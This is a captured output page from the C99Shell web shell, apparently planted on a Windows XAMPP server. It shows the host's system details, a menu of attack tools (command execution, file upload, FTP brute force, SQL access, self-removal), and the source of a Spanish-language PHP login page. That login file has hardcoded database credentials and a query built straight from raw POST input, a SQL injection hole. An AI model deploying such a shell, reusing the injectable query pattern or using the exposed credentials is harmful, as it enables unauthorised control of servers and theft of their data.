!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\phpold\SesionResoluciones\   drwxrwxrwx
Free 8.8 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     accesoresoluciones.php (1.31 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<html>
    <head>
        <title>Acceso Resoluciones</title>
        <link href="cssfabian/style.css" rel=stylesheet type="text/css">
    </head>
    <body>
        <?php

            
//CONECCION A LA BD
            
$coneccion mysql_connect("localhost""jaime""123");
            
mysql_select_db('auto',$coneccion);
            
                    
            
/*
            if(    mysql_select_db('mibdd',$coneccion))
                echo "Se conectó";
            else
                echo "No se conectó";                
            */

            
$sql "select * from usuarios where user='".$_POST['user']."'and pass='".$_POST['pass']."'";
            
            
//query = resultado de mysql
            
$resultado mysql_query($sql);

            
//fetch: recorrer todo el quer
            
if($row mysql_fetch_row($resultado)){

                
//INICIO DE SESIÓN
                
session_name("Resoluciones");
                
session_start();
                
                
$_SESSION['nombre'] = $row[2];
                
$_SESSION['user'] = $row[0];
                
//    header = REDIRECCIONAR
                //        para que funcione bien no debe haber antes ningun echo o print
                //        funciona como un GET
            //    header("Location:home.php?nombre=".$row[2]);
            
                
header("Location:home.php");
            }else{
                print 
"<script>self.location='index.php'</script>";            
            }

/*
            if($resultado==''){                
                header("location: index.php");
                print "<script>self.location='index.php'</script>";            
            }else{
                header("location: home.php");

            }
*/                

        
?>
    </body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--